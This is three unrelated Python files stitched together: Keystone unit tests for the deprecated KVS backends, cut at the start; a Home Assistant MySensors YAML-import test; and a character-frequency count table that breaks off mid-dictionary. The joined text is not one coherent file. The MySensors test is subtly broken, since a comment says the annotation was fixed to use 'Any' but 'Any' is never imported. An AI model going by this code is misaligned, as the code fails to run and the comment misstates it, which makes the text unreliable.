from keystone.tests.ksfixtures import database
from keystone.tests import test_backend
CONF = config.CONF
class KvsIdentity(tests.TestCase, test_backend.IdentityTests):
    """Run the shared identity-backend tests against the (deprecated)
    KVS identity driver, skipping tests the driver does not support."""
    def setUp(self):
        # NOTE(dstanek): setup the database for subsystems that only have a
        # SQL backend (like credentials)
        self.useFixture(database.Database())
        super(KvsIdentity, self).setUp()
        self.load_backends()
        self.load_fixtures(default_fixtures)
    def config_overrides(self):
        # Point the identity subsystem at the KVS driver under test.
        super(KvsIdentity, self).config_overrides()
        self.config_fixture.config(
            group='identity',
            driver='keystone.identity.backends.kvs.Identity')
    def test_password_hashed(self):
        # The stored password must differ from the plaintext fixture value.
        driver = self.identity_api._select_identity_driver(
            self.user_foo['domain_id'])
        user_ref = driver._get_user(self.user_foo['id'])
        self.assertNotEqual(user_ref['password'], self.user_foo['password'])
    def test_list_projects_for_user_with_grants(self):
        self.skipTest('kvs backend is now deprecated')
    def test_create_duplicate_group_name_in_different_domains(self):
        self.skipTest('Blocked by bug 1119770')
    def test_create_duplicate_user_name_in_different_domains(self):
        self.skipTest('Blocked by bug 1119770')
    def test_create_duplicate_project_name_in_different_domains(self):
        self.skipTest('Blocked by bug 1119770')
    def test_move_user_between_domains(self):
        self.skipTest('Blocked by bug 1119770')
    def test_move_user_between_domains_with_clashing_names_fails(self):
        self.skipTest('Blocked by bug 1119770')
    def test_move_group_between_domains(self):
        self.skipTest('Blocked by bug 1119770')
    def test_move_group_between_domains_with_clashing_names_fails(self):
        self.skipTest('Blocked by bug 1119770')
    def test_move_project_between_domains(self):
        self.skipTest('Blocked by bug 1119770')
    def test_move_project_between_domains_with_clashing_names_fails(self):
        self.skipTest('Blocked by bug 1119770')
    def test_delete_group_removes_role_assignments(self):
        # When a group is deleted any role assignments for the group are
        # supposed to be removed, but the KVS backend doesn't implement the
        # functionality so the assignments are left around.
        DEFAULT_DOMAIN_ID = CONF.identity.default_domain_id
        MEMBER_ROLE_ID = 'member'
        def get_member_assignments():
            # All current assignments of the 'member' role.
            # (Python 2: filter() returns a list here.)
            assignments = self.assignment_api.list_role_assignments()
            return filter(lambda x: x['role_id'] == MEMBER_ROLE_ID,
                          assignments)
        # Create a group.
        new_group = {
            'domain_id': DEFAULT_DOMAIN_ID,
            'name': self.getUniqueString(prefix='tdgrra')}
        new_group = self.identity_api.create_group(new_group)
        # Create a project.
        new_project = {
            'id': uuid.uuid4().hex,
            'name': self.getUniqueString(prefix='tdgrra'),
            'domain_id': DEFAULT_DOMAIN_ID}
        self.assignment_api.create_project(new_project['id'], new_project)
        # Assign a role to the group.
        self.assignment_api.create_grant(
            group_id=new_group['id'], project_id=new_project['id'],
            role_id=MEMBER_ROLE_ID)
        new_role_assignments = get_member_assignments()
        # Delete the group.
        self.identity_api.delete_group(new_group['id'])
        # Check that the role assignment for the group is still there since
        # kvs doesn't implement cleanup.
        member_assignments = get_member_assignments()
        self.assertThat(member_assignments,
                        matchers.Equals(new_role_assignments))
    def test_list_role_assignments_filtered_by_inherited(self):
        self.skipTest('Blocked by bug 1360406')
    def test_list_role_assignments_combined_filters(self):
        self.skipTest('Blocked by bug 1360406')
    def test_inherited_grant_for_user_on_project_crud(self):
        self.skipTest('Blocked by bug 1360406')
    def test_inherited_grant_for_group_on_project_crud(self):
        self.skipTest('Blocked by bug 1360406')
class KvsToken(tests.TestCase, test_backend.TokenTests):
    """Run the shared token-backend tests against the KVS token driver,
    plus KVS-specific checks on the per-user token index."""
    def setUp(self):
        super(KvsToken, self).setUp()
        self.load_backends()
    def config_overrides(self):
        super(KvsToken, self).config_overrides()
        self.config_fixture.config(
            group='identity',
            driver='keystone.identity.backends.kvs.Identity')
    def test_flush_expired_token(self):
        # The KVS token persistence driver does not support flushing.
        self.assertRaises(
            exception.NotImplemented,
            self.token_provider_api._persistence.flush_expired_tokens)
    def _update_user_token_index_direct(self, user_key, token_id, new_data):
        """Overwrite *token_id*'s entry in the user's token index with
        *new_data*, bypassing the normal token APIs."""
        persistence = self.token_provider_api._persistence
        token_list = persistence.driver._get_user_token_list_with_expiry(
            user_key)
        # Update the user-index so that the expires time is _actually_ expired
        # since we do not do an explicit get on the token, we only reference
        # the data in the user index (to save extra round-trips to the kvs
        # backend).
        for i, data in enumerate(token_list):
            if data[0] == token_id:
                token_list[i] = new_data
                break
        self.token_provider_api._persistence.driver._store.set(user_key,
                                                               token_list)
    def test_cleanup_user_index_on_create(self):
        # Expired and revoked tokens should be dropped from the per-user
        # token index when a new token is created.
        user_id = six.text_type(uuid.uuid4().hex)
        valid_token_id, data = self.create_token_sample_data(user_id=user_id)
        expired_token_id, expired_data = self.create_token_sample_data(
            user_id=user_id)
        expire_delta = datetime.timedelta(seconds=86400)
        # NOTE(morganfainberg): Directly access the data cache since we need to
        # get expired tokens as well as valid tokens.
        token_persistence = self.token_provider_api._persistence
        user_key = token_persistence.driver._prefix_user_id(user_id)
        user_token_list = token_persistence.driver._store.get(user_key)
        valid_token_ref = token_persistence.get_token(valid_token_id)
        expired_token_ref = token_persistence.get_token(expired_token_id)
        expected_user_token_list = [
            (valid_token_id, timeutils.isotime(valid_token_ref['expires'],
                                               subsecond=True)),
            (expired_token_id, timeutils.isotime(expired_token_ref['expires'],
                                                 subsecond=True))]
        self.assertEqual(expected_user_token_list, user_token_list)
        # Force the second token's index entry into the past.
        new_expired_data = (expired_token_id,
                            timeutils.isotime(
                                (timeutils.utcnow() - expire_delta),
                                subsecond=True))
        self._update_user_token_index_direct(user_key, expired_token_id,
                                             new_expired_data)
        valid_token_id_2, valid_data_2 = self.create_token_sample_data(
            user_id=user_id)
        valid_token_ref_2 = token_persistence.get_token(valid_token_id_2)
        # Creating the new token should have evicted the expired entry.
        expected_user_token_list = [
            (valid_token_id, timeutils.isotime(valid_token_ref['expires'],
                                               subsecond=True)),
            (valid_token_id_2, timeutils.isotime(valid_token_ref_2['expires'],
                                                 subsecond=True))]
        user_token_list = token_persistence.driver._store.get(user_key)
        self.assertEqual(expected_user_token_list, user_token_list)
        # Test that revoked tokens are removed from the list on create.
        token_persistence.delete_token(valid_token_id_2)
        new_token_id, data = self.create_token_sample_data(user_id=user_id)
        new_token_ref = token_persistence.get_token(new_token_id)
        expected_user_token_list = [
            (valid_token_id, timeutils.isotime(valid_token_ref['expires'],
                                               subsecond=True)),
            (new_token_id, timeutils.isotime(new_token_ref['expires'],
                                             subsecond=True))]
        user_token_list = token_persistence.driver._store.get(user_key)
        self.assertEqual(expected_user_token_list, user_token_list)
class KvsTrust(tests.TestCase, test_backend.TrustTests):
    """Run the shared trust-backend tests against the KVS trust driver."""
    def setUp(self):
        super(KvsTrust, self).setUp()
        self.load_backends()
        self.load_fixtures(default_fixtures)
    def config_overrides(self):
        # Select the KVS drivers for identity, trust, and catalog.
        super(KvsTrust, self).config_overrides()
        self.config_fixture.config(
            group='identity',
            driver='keystone.identity.backends.kvs.Identity')
        self.config_fixture.config(
            group='trust',
            driver='keystone.trust.backends.kvs.Trust')
        self.config_fixture.config(
            group='catalog',
            driver='keystone.catalog.backends.kvs.Catalog')
class KvsCatalog(tests.TestCase, test_backend.CatalogTests):
    """Run the shared catalog-backend tests against the KVS catalog
    driver, adjusting for KVS's per-user/per-project catalogs."""
    def setUp(self):
        super(KvsCatalog, self).setUp()
        self.load_backends()
        self._load_fake_catalog()
    def config_overrides(self):
        # Select the KVS drivers for identity, trust, and catalog.
        super(KvsCatalog, self).config_overrides()
        self.config_fixture.config(
            group='identity',
            driver='keystone.identity.backends.kvs.Identity')
        self.config_fixture.config(
            group='trust',
            driver='keystone.trust.backends.kvs.Trust')
        self.config_fixture.config(
            group='catalog',
            driver='keystone.catalog.backends.kvs.Catalog')
    def _load_fake_catalog(self):
        # Seed a catalog for user 'foo' / project 'bar'.
        self.catalog_foobar = self.catalog_api.driver._create_catalog(
            'foo', 'bar',
            {'RegionFoo': {'service_bar': {'foo': 'bar'}}})
    def test_get_catalog_404(self):
        # FIXME(dolph): this test should be moved up to test_backend
        # FIXME(dolph): exceptions should be UserNotFound and ProjectNotFound
        self.assertRaises(exception.NotFound,
                          self.catalog_api.get_catalog,
                          uuid.uuid4().hex,
                          'bar')
        self.assertRaises(exception.NotFound,
                          self.catalog_api.get_catalog,
                          'foo',
                          uuid.uuid4().hex)
    def test_get_catalog(self):
        # The seeded catalog should round-trip unchanged.
        catalog_ref = self.catalog_api.get_catalog('foo', 'bar')
        self.assertDictEqual(catalog_ref, self.catalog_foobar)
    def test_get_catalog_endpoint_disabled(self):
        # This test doesn't apply to KVS because with the KVS backend the
        # application creates the catalog (including the endpoints) for each
        # user and project. Whether endpoints are enabled or disabled isn't
        # a consideration.
        f = super(KvsCatalog, self).test_get_catalog_endpoint_disabled
        self.assertRaises(exception.NotFound, f)
    def test_get_v3_catalog_endpoint_disabled(self):
        # There's no need to have disabled endpoints in the kvs catalog. Those
        # endpoints should just be removed from the store. This just tests
        # what happens currently when the super impl is called.
        f = super(KvsCatalog, self).test_get_v3_catalog_endpoint_disabled
        self.assertRaises(exception.NotFound, f)
    def test_list_regions_filtered_by_parent_region_id(self):
        self.skipTest('KVS backend does not support hints')
    def test_service_filtering(self):
        self.skipTest("kvs backend doesn't support filtering")
class KvsTokenCacheInvalidation(tests.TestCase,
                                test_backend.TokenCacheInvalidation):
    """Run the shared token-cache-invalidation tests against the KVS
    token driver."""
    def setUp(self):
        super(KvsTokenCacheInvalidation, self).setUp()
        self.load_backends()
        self._create_test_data()
    def config_overrides(self):
        # Select the KVS drivers for identity and token storage.
        super(KvsTokenCacheInvalidation, self).config_overrides()
        self.config_fixture.config(
            group='identity',
            driver='keystone.identity.backends.kvs.Identity')
        self.config_fixture.config(
            group='token',
            driver='keystone.token.backends.kvs.Token')
class KvsInheritanceTests(tests.TestCase, test_backend.InheritanceTests):
    """Run the shared role-inheritance tests against the KVS assignment
    driver."""
    def setUp(self):
        # NOTE(dstanek): setup the database for subsystems that only have a
        # SQL backend (like credentials)
        self.useFixture(database.Database())
        super(KvsInheritanceTests, self).setUp()
        self.load_backends()
        self.load_fixtures(default_fixtures)
    def config_overrides(self):
        # Select the KVS drivers for identity and assignment.
        super(KvsInheritanceTests, self).config_overrides()
        self.config_fixture.config(
            group='identity',
            driver='keystone.identity.backends.kvs.Identity')
        self.config_fixture.config(
            group='assignment',
            driver='keystone.assignment.backends.kvs.Assignment')
| |
"""Test function in __init__.py."""
from typing import Dict
from unittest.mock import patch
import pytest
from homeassistant.components.mysensors import (
CONF_BAUD_RATE,
CONF_DEVICE,
CONF_GATEWAYS,
CONF_PERSISTENCE,
CONF_PERSISTENCE_FILE,
CONF_RETAIN,
CONF_TCP_PORT,
CONF_VERSION,
DEFAULT_VERSION,
DOMAIN,
)
from homeassistant.components.mysensors.const import (
CONF_GATEWAY_TYPE,
CONF_GATEWAY_TYPE_MQTT,
CONF_GATEWAY_TYPE_SERIAL,
CONF_GATEWAY_TYPE_TCP,
CONF_TOPIC_IN_PREFIX,
CONF_TOPIC_OUT_PREFIX,
)
from homeassistant.helpers.typing import ConfigType, HomeAssistantType
from homeassistant.setup import async_setup_component
@pytest.mark.parametrize(
    "config, expected_calls, expected_to_succeed, expected_config_flow_user_input",
    [
        # Fully-specified serial gateway: imported as one config entry.
        (
            {
                DOMAIN: {
                    CONF_GATEWAYS: [
                        {
                            CONF_DEVICE: "COM5",
                            CONF_PERSISTENCE_FILE: "bla.json",
                            CONF_BAUD_RATE: 57600,
                            CONF_TCP_PORT: 5003,
                        }
                    ],
                    CONF_VERSION: "2.3",
                    CONF_PERSISTENCE: False,
                    CONF_RETAIN: True,
                }
            },
            1,
            True,
            {
                CONF_GATEWAY_TYPE: CONF_GATEWAY_TYPE_SERIAL,
                CONF_DEVICE: "COM5",
                CONF_PERSISTENCE_FILE: "bla.json",
                CONF_BAUD_RATE: 57600,
                CONF_VERSION: "2.3",
            },
        ),
        # Fully-specified TCP gateway: imported as one config entry.
        (
            {
                DOMAIN: {
                    CONF_GATEWAYS: [
                        {
                            CONF_DEVICE: "127.0.0.1",
                            CONF_PERSISTENCE_FILE: "blub.pickle",
                            CONF_BAUD_RATE: 115200,
                            CONF_TCP_PORT: 343,
                        }
                    ],
                    CONF_VERSION: "2.4",
                    CONF_PERSISTENCE: False,
                    CONF_RETAIN: False,
                }
            },
            1,
            True,
            {
                CONF_GATEWAY_TYPE: CONF_GATEWAY_TYPE_TCP,
                CONF_DEVICE: "127.0.0.1",
                CONF_PERSISTENCE_FILE: "blub.pickle",
                CONF_TCP_PORT: 343,
                CONF_VERSION: "2.4",
            },
        ),
        # Minimal TCP gateway: defaults fill in port and version.
        (
            {
                DOMAIN: {
                    CONF_GATEWAYS: [
                        {
                            CONF_DEVICE: "127.0.0.1",
                        }
                    ],
                    CONF_PERSISTENCE: False,
                    CONF_RETAIN: False,
                }
            },
            1,
            True,
            {
                CONF_GATEWAY_TYPE: CONF_GATEWAY_TYPE_TCP,
                CONF_DEVICE: "127.0.0.1",
                CONF_TCP_PORT: 5003,
                CONF_VERSION: DEFAULT_VERSION,
            },
        ),
        # MQTT gateway with both topic prefixes: imported as one config entry.
        (
            {
                DOMAIN: {
                    CONF_GATEWAYS: [
                        {
                            CONF_DEVICE: "mqtt",
                            CONF_BAUD_RATE: 115200,
                            CONF_TCP_PORT: 5003,
                            CONF_TOPIC_IN_PREFIX: "intopic",
                            CONF_TOPIC_OUT_PREFIX: "outtopic",
                        }
                    ],
                    CONF_PERSISTENCE: False,
                    CONF_RETAIN: False,
                }
            },
            1,
            True,
            {
                CONF_GATEWAY_TYPE: CONF_GATEWAY_TYPE_MQTT,
                CONF_DEVICE: "mqtt",
                CONF_VERSION: DEFAULT_VERSION,
                CONF_TOPIC_OUT_PREFIX: "outtopic",
                CONF_TOPIC_IN_PREFIX: "intopic",
            },
        ),
        # MQTT gateway missing topic prefixes: setup succeeds but no entry is created.
        (
            {
                DOMAIN: {
                    CONF_GATEWAYS: [
                        {
                            CONF_DEVICE: "mqtt",
                            CONF_BAUD_RATE: 115200,
                            CONF_TCP_PORT: 5003,
                        }
                    ],
                    CONF_PERSISTENCE: False,
                    CONF_RETAIN: False,
                }
            },
            0,
            True,
            {},
        ),
        # Two distinct gateways: two config entries are created.
        (
            {
                DOMAIN: {
                    CONF_GATEWAYS: [
                        {
                            CONF_DEVICE: "mqtt",
                            CONF_PERSISTENCE_FILE: "bla.json",
                            CONF_TOPIC_OUT_PREFIX: "out",
                            CONF_TOPIC_IN_PREFIX: "in",
                            CONF_BAUD_RATE: 115200,
                            CONF_TCP_PORT: 5003,
                        },
                        {
                            CONF_DEVICE: "COM6",
                            CONF_PERSISTENCE_FILE: "bla2.json",
                            CONF_BAUD_RATE: 115200,
                            CONF_TCP_PORT: 5003,
                        },
                    ],
                    CONF_VERSION: "2.4",
                    CONF_PERSISTENCE: False,
                    CONF_RETAIN: False,
                }
            },
            2,
            True,
            {},
        ),
        # Duplicate persistence file across gateways: setup fails outright.
        (
            {
                DOMAIN: {
                    CONF_GATEWAYS: [
                        {
                            CONF_DEVICE: "mqtt",
                            CONF_PERSISTENCE_FILE: "bla.json",
                            CONF_BAUD_RATE: 115200,
                            CONF_TCP_PORT: 5003,
                        },
                        {
                            CONF_DEVICE: "COM6",
                            CONF_PERSISTENCE_FILE: "bla.json",
                            CONF_BAUD_RATE: 115200,
                            CONF_TCP_PORT: 5003,
                        },
                    ],
                    CONF_VERSION: "2.4",
                    CONF_PERSISTENCE: False,
                    CONF_RETAIN: False,
                }
            },
            0,
            False,
            {},
        ),
        # Invalid serial device name: setup succeeds but no entry is created.
        (
            {
                DOMAIN: {
                    CONF_GATEWAYS: [
                        {
                            CONF_DEVICE: "COMx",
                            CONF_PERSISTENCE_FILE: "bla.json",
                            CONF_BAUD_RATE: 115200,
                            CONF_TCP_PORT: 5003,
                        },
                    ],
                    CONF_VERSION: "2.4",
                    CONF_PERSISTENCE: False,
                    CONF_RETAIN: False,
                }
            },
            0,
            True,
            {},
        ),
    ],
)
async def test_import(
    hass: HomeAssistantType,
    config: ConfigType,
    expected_calls: int,
    expected_to_succeed: bool,
    # Fixed: was annotated `Dict[str, any]` — the builtin `any` function is
    # not a type; `typing.Any` is the intended annotation.
    expected_config_flow_user_input: Dict[str, Any],
):
    """Test importing a gateway from YAML configuration.

    Verifies that setup succeeds/fails as expected, that the right number of
    config entries are created, and that the entry data matches the expected
    config-flow user input.
    """
    # sys.platform is patched so serial-device validation behaves like Windows
    # ("COM5" valid, "COMx" invalid) regardless of the test host.
    with patch("sys.platform", "win32"), patch(
        "homeassistant.components.mysensors.config_flow.try_connect", return_value=True
    ), patch(
        "homeassistant.components.mysensors.async_setup_entry",
        return_value=True,
    ) as mock_setup_entry:
        result = await async_setup_component(hass, DOMAIN, config)
        assert result == expected_to_succeed
        await hass.async_block_till_done()

    assert len(mock_setup_entry.mock_calls) == expected_calls

    if expected_calls > 0:
        # mock_calls[0][1] are the positional args of the first call;
        # arg index 1 is the ConfigEntry, whose .data holds the imported input.
        config_flow_user_input = mock_setup_entry.mock_calls[0][1][1].data
        for key, value in expected_config_flow_user_input.items():
            assert key in config_flow_user_input
            assert config_flow_user_input[key] == value
| |
# Grand total associated with the frequency tables below — presumably the
# size of the corpus the ONE/TWO counts were taken from (TODO confirm
# against whatever generated these tables).
TOTAL = 1306336
# Single-character frequency table: maps each character ('0'-'9', 'a'-'z')
# to an integer count — presumably unigram occurrence counts from the same
# corpus as TOTAL (TODO confirm; machine-generated, do not edit by hand).
ONE = {
    '0': 1473,
    '1': 5936,
    '2': 3681,
    '3': 2996,
    '4': 2480,
    '5': 2494,
    '6': 1324,
    '7': 1474,
    '8': 1754,
    '9': 1740,
    'a': 79714,
    'b': 83472,
    'c': 78015,
    'd': 61702,
    'e': 42190,
    'f': 68530,
    'g': 48942,
    'h': 63661,
    'i': 34947,
    'j': 24312,
    'k': 26724,
    'l': 66351,
    'm': 77245,
    'n': 36942,
    'o': 40744,
    'p': 68978,
    'q': 6750,
    'r': 49135,
    's': 116034,
    't': 87440,
    'u': 19423,
    'v': 22356,
    'w': 50718,
    'x': 6079,
    'y': 13089,
    'z': 7491,
}
TWO = {
'0-': 19,
'00': 145,
'01': 143,
'02': 212,
'03': 90,
'04': 61,
'05': 241,
'06': 31,
'07': 151,
'08': 104,
'09': 99,
'0a': 8,
'0b': 8,
'0c': 16,
'0d': 18,
'0e': 8,
'0f': 7,
'0g': 5,
'0h': 4,
'0i': 9,
'0j': 1,
'0k': 4,
'0l': 2,
'0m': 8,
'0n': 10,
'0o': 6,
'0p': 10,
'0r': 10,
'0s': 10,
'0t': 6,
'0u': 5,
'0v': 5,
'0w': 5,
'0x': 4,
'0y': 3,
'0z': 5,
'1-': 177,
'10': 983,
'11': 537,
'12': 767,
'13': 327,
'14': 270,
'15': 257,
'16': 276,
'17': 318,
'18': 505,
'19': 280,
'1a': 61,
'1b': 58,
'1c': 84,
'1d': 52,
'1e': 33,
'1f': 32,
'1g': 38,
'1h': 44,
'1i': 25,
'1j': 13,
'1k': 32,
'1l': 33,
'1m': 59,
'1n': 39,
'1o': 37,
'1p': 68,
'1q': 7,
'1r': 21,
'1s': 336,
'1t': 54,
'1u': 15,
'1v': 14,
'1w': 53,
'1x': 7,
'1y': 14,
'1z': 10,
'2-': 30,
'20': 889,
'21': 406,
'22': 228,
'23': 172,
'24': 480,
'25': 177,
'26': 126,
'27': 96,
'28': 108,
'29': 73,
'2a': 50,
'2b': 94,
'2c': 59,
'2d': 61,
'2e': 29,
'2f': 29,
'2g': 47,
'2h': 24,
'2i': 22,
'2j': 13,
'2k': 27,
'2l': 35,
'2m': 62,
'2n': 53,
'2o': 22,
'2p': 48,
'2q': 7,
'2r': 14,
'2s': 53,
'2t': 43,
'2u': 20,
'2v': 7,
'2w': 43,
'2x': 21,
'2y': 7,
'2z': 6,
'3-': 53,
'30': 292,
'31': 224,
'32': 188,
'33': 179,
'34': 91,
'35': 153,
'36': 367,
'37': 101,
'38': 122,
'39': 118,
'3a': 50,
'3b': 45,
'3c': 37,
'3d': 350,
'3e': 17,
'3f': 26,
'3g': 125,
'3h': 27,
'3i': 11,
'3j': 9,
'3k': 19,
'3l': 25,
'3m': 45,
'3n': 17,
'3o': 15,
'3p': 32,
'3q': 12,
'3r': 72,
'3s': 53,
'3t': 28,
'3u': 3,
'3v': 13,
'3w': 36,
'3x': 17,
'3y': 14,
'3z': 10,
'4-': 76,
'40': 357,
'41': 259,
'42': 170,
'43': 88,
'44': 126,
'45': 102,
'46': 67,
'47': 56,
'48': 97,
'49': 62,
'4a': 41,
'4b': 49,
'4c': 55,
'4d': 53,
'4e': 51,
'4f': 43,
'4g': 52,
'4h': 44,
'4i': 19,
'4j': 13,
'4k': 22,
'4l': 48,
'4m': 62,
'4n': 22,
'4o': 21,
'4p': 60,
'4q': 11,
'4r': 26,
'4s': 94,
'4t': 44,
'4u': 40,
'4v': 17,
'4w': 45,
'4x': 58,
'4y': 24,
'4z': 6,
'5-': 30,
'50': 323,
'51': 574,
'52': 361,
'53': 79,
'54': 155,
'55': 141,
'56': 109,
'57': 66,
'58': 85,
'59': 87,
'5a': 32,
'5b': 17,
'5c': 21,
'5d': 39,
'5e': 7,
'5f': 17,
'5g': 21,
'5h': 10,
'5i': 54,
'5j': 4,
'5k': 16,
'5l': 19,
'5m': 22,
'5n': 8,
'5o': 12,
'5p': 27,
'5q': 4,
'5r': 9,
'5s': 55,
'5t': 38,
'5u': 17,
'5v': 5,
'5w': 5,
'5x': 9,
'5y': 10,
'5z': 6,
'6-': 42,
'60': 173,
'61': 182,
'62': 63,
'63': 56,
'64': 51,
'65': 125,
'66': 134,
'67': 62,
'68': 58,
'69': 105,
'6a': 12,
'6b': 7,
'6c': 11,
'6d': 61,
'6e': 6,
'6f': 15,
'6g': 7,
'6h': 11,
'6i': 6,
'6j': 1,
'6k': 7,
'6l': 8,
'6m': 16,
'6n': 1,
'6o': 5,
'6p': 12,
'6q': 6,
'6r': 15,
'6s': 28,
'6t': 12,
'6u': 2,
'6v': 2,
'6w': 8,
'6x': 5,
'6y': 9,
'7-': 34,
'70': 200,
'71': 205,
'72': 81,
'73': 58,
'74': 53,
'75': 59,
'76': 69,
'77': 191,
'78': 92,
'79': 48,
'7a': 33,
'7b': 18,
'7c': 28,
'7d': 31,
'7e': 13,
'7f': 15,
'7g': 11,
'7h': 15,
'7i': 7,
'7j': 8,
'7k': 16,
'7l': 19,
'7m': 15,
'7n': 5,
'7o': 13,
'7p': 10,
'7q': 2,
'7r': 4,
'7s': 33,
'7t': 37,
'7u': 2,
'7v': 3,
'7w': 13,
'7x': 13,
'7y': 12,
'7z': 8,
'8-': 61,
'80': 336,
'81': 180,
'82': 61,
'83': 62,
'84': 99,
'85': 85,
'86': 138,
'87': 85,
'88': 339,
'89': 78,
'8a': 11,
'8b': 16,
'8c': 9,
'8d': 10,
'8e': 6,
'8f': 10,
'8g': 18,
'8h': 7,
'8i': 12,
'8j': 4,
'8k': 6,
'8l': 6,
'8m': 11,
'8n': 2,
'8o': 8,
'8p': 15,
'8q': 7,
'8r': 10,
'8s': 18,
'8t': 24,
'8u': 3,
'8v': 2,
'8w': 4,
'8x': 1,
'8y': 6,
'8z': 4,
'9-': 45,
'90': 173,
'91': 275,
'92': 149,
'93': 59,
'94': 76,
'95': 82,
'96': 76,
'97': 123,
'98': 74,
'99': 270,
'9a': 19,
'9b': 9,
'9c': 22,
'9d': 17,
'9e': 10,
'9f': 5,
'9g': 16,
'9h': 6,
'9i': 20,
'9j': 10,
'9k': 9,
'9l': 13,
'9m': 19,
'9n': 8,
'9o': 8,
'9p': 29,
'9q': 3,
'9r': 11,
'9s': 22,
'9t': 26,
'9u': 3,
'9v': 8,
'9w': 11,
'9x': 21,
'9y': 8,
'9z': 5,
'a-': 307,
'a0': 6,
'a1': 172,
'a2': 58,
'a3': 25,
'a4': 16,
'a5': 9,
'a6': 8,
'a7': 20,
'a8': 12,
'a9': 15,
'aa': 778,
'ab': 3124,
'ac': 4416,
'ad': 5316,
'ae': 537,
'af': 1343,
'ag': 4563,
'ah': 760,
'ai': 5617,
'aj': 331,
'ak': 715,
'al': 9102,
'am': 4388,
'an': 8462,
'ao': 351,
'ap': 2155,
'aq': 426,
'ar': 9178,
'as': 6419,
'at': 4007,
'au': 2485,
'av': 1218,
'aw': 1869,
'ax': 403,
'ay': 457,
'az': 646,
'b-': 148,
'b0': 7,
'b1': 19,
'b2': 94,
'b3': 12,
'b4': 24,
'b5': 9,
'b6': 4,
'b7': 5,
'b8': 2,
'b9': 6,
'ba': 15356,
'bb': 477,
'bc': 323,
'bd': 266,
'be': 14064,
'bf': 200,
'bg': 189,
'bh': 311,
'bi': 11911,
'bj': 604,
'bk': 178,
'bl': 5297,
'bm': 306,
'bn': 218,
'bo': 11986,
'bp': 229,
'bq': 103,
'br': 5001,
'bs': 317,
'bt': 266,
'bu': 12643,
'bv': 126,
'bw': 147,
'bx': 91,
'by': 2394,
'bz': 139,
'c-': 120,
'c0': 13,
'c1': 21,
'c2': 78,
'c3': 34,
'c4': 30,
'c5': 6,
'c6': 4,
'c7': 10,
'c8': 4,
'c9': 8,
'ca': 18400,
'cb': 368,
'cc': 678,
'cd': 484,
'ce': 3579,
'cf': 300,
'cg': 253,
'ch': 11318,
'ci': 2463,
'cj': 218,
'ck': 165,
'cl': 5881,
'cm': 371,
'cn': 895,
'co': 15790,
'cp': 497,
'cq': 239,
'cr': 5502,
'cs': 1710,
'ct': 364,
'cu': 6370,
'cv': 200,
'cw': 201,
'cx': 142,
'cy': 1053,
'cz': 246,
'd-': 147,
'd0': 7,
'd1': 14,
'd2': 37,
'd3': 29,
'd4': 10,
'd5': 5,
'd6': 4,
'd7': 8,
'd8': 6,
'd9': 7,
'da': 9910,
'db': 288,
'dc': 410,
'dd': 303,
'de': 11362,
'df': 288,
'dg': 307,
'dh': 280,
'di': 10934,
'dj': 682,
'dk': 157,
'dl': 393,
'dm': 361,
'dn': 476,
'do': 10944,
'dp': 211,
'dq': 106,
'dr': 6965,
'ds': 393,
'dt': 262,
'du': 4853,
'dv': 376,
'dw': 211,
'dx': 157,
'dy': 630,
'dz': 169,
'e-': 1066,
'e0': 9,
'e1': 12,
'e2': 26,
'e3': 27,
'e4': 11,
'e5': 2,
'e6': 6,
'e7': 6,
'e8': 37,
'e9': 5,
'ea': 6784,
'eb': 771,
'ec': 1530,
'ed': 2674,
'ee': 257,
'ef': 482,
'eg': 508,
'eh': 276,
'ei': 552,
'ej': 151,
'ek': 329,
'el': 3657,
'em': 1785,
'en': 4879,
'eo': 205,
'ep': 613,
'eq': 553,
'er': 2767,
'es': 1797,
'et': 766,
'eu': 1095,
'ev': 2975,
'ew': 218,
'ex': 2521,
'ey': 2066,
'ez': 772,
'f-': 75,
'f0': 6,
'f1': 54,
'f2': 25,
'f3': 5,
'f4': 9,
'f5': 12,
'f6': 2,
'f7': 4,
'f8': 10,
'f9': 2,
'fa': 12917,
'fb': 165,
'fc': 272,
'fd': 154,
'fe': 8514,
'ff': 195,
'fg': 107,
'fh': 175,
'fi': 14464,
'fj': 192,
'fk': 90,
'fl': 7482,
'fm': 210,
'fn': 114,
'fo': 8864,
'fp': 132,
'fq': 77,
'fr': 7566,
'fs': 413,
'ft': 252,
'fu': 5259,
'fv': 88,
'fw': 129,
'fx': 197,
'fy': 155,
'fz': 143,
'g-': 138,
'g0': 21,
'g1': 38,
'g2': 26,
'g3': 34,
'g4': 26,
'g5': 11,
'g6': 5,
'g7': 5,
'g8': 15,
'g9': 5,
'ga': 8708,
'gb': 232,
'gc': 262,
'gd': 339,
'ge': 5489,
'gf': 176,
'gg': 245,
'gh': 399,
'gi': 3752,
'gj': 108,
'gk': 138,
'gl': 2606,
'gm': 387,
'gn': 217,
'go': 9782,
'gp': 455,
'gq': 78,
'gr': 8101,
'gs': 381,
'gt': 252,
'gu': 5335,
'gv': 138,
'gw': 202,
'gx': 176,
'gy': 265,
'gz': 395,
'h-': 120,
'h0': 6,
'h1': 14,
'h2': 149,
'h3': 15,
'h4': 28,
'h5': 6,
'h6': 3,
'h7': 2,
'h8': 8,
'h9': 2,
'ha': 16216,
'hb': 351,
'hc': 228,
'hd': 442,
'he': 12087,
'hf': 180,
'hg': 158,
'hh': 243,
'hi': 10582,
'hj': 147,
'hk': 331,
'hl': 215,
'hm': 214,
'hn': 317,
'ho': 14380,
'hp': 207,
'hq': 147,
'hr': 318,
'hs': 380,
'ht': 314,
'hu': 4226,
'hv': 119,
'hw': 147,
'hx': 150,
'hy': 943,
'hz': 266,
'i-': 527,
'i0': 9,
'i1': 8,
'i2': 34,
'i3': 14,
'i4': 17,
'i5': 4,
'i6': 6,
'i7': 12,
'i8': 8,
'i9': 11,
'ia': 606,
'ib': 659,
'ic': 2175,
'id': 1981,
'ie': 282,
'if': 1514,
'ig': 488,
'ih': 370,
'ii': 226,
'ij': 122,
'ik': 351,
'il': 2287,
'im': 2155,
'in': 10117,
'io': 344,
'ip': 818,
'iq': 154,
'ir': 1037,
'is': 2803,
'it': 4514,
'iu': 135,
'iv': 328,
'iw': 391,
'ix': 87,
'iy': 123,
'iz': 230,
'j-': 143,
'j0': 7,
'j1': 2,
'j2': 20,
'j3': 8,
'j4': 10,
'j5': 1,
'j6': 1,
'j7': 2,
'j8': 3,
'j9': 2,
'ja': 3167,
'jb': 251,
'jc': 336,
'jd': 290,
'je': 2239,
'jf': 152,
'jg': 136,
'jh': 228,
'ji': 1541,
'jj': 266,
'jk': 191,
'jl': 249,
'jm': 340,
'jn': 230,
'jo': 7930,
'jp': 278,
'jq': 82,
'jr': 261,
'js': 448,
'jt': 174,
'ju': 4460,
'jv': 125,
